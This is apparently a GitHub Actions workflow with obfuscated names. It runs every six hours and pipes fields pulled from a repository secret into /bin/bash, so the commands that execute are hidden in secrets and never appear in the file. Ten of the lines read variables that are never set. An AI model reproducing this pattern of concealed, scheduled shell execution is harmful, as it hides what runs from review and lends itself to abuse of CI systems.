name: rentianjie2764
on:
  workflow_dispatch:
  schedule:
    - cron: '26 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: rentianjie2764
        env:
          htgyt29: ${{ secrets.htgyt29 }}
        run: |
          echo $htgyt29 | jq -r .wy8468 | /bin/bash
          echo $nwnpt62 | jq -r .cku1 | /bin/bash
          echo $vjbv5350 | jq -r .vn9502 | /bin/bash
          echo $w1885 | jq -r .klrv14846 | /bin/bash
          echo $qwwf88183 | jq -r .z6655 | /bin/bash
          echo $h7247 | jq -r .xyqr961 | /bin/bash
          echo $fdn99032 | jq -r .sh088 | /bin/bash
          echo $iey8 | jq -r .cu9556 | /bin/bash
          echo $wwvga20 | jq -r .m3650 | /bin/bash
          echo $oq412 | jq -r .wkj78189 | /bin/bash
          echo $m60 | jq -r .fyq8 | /bin/bash

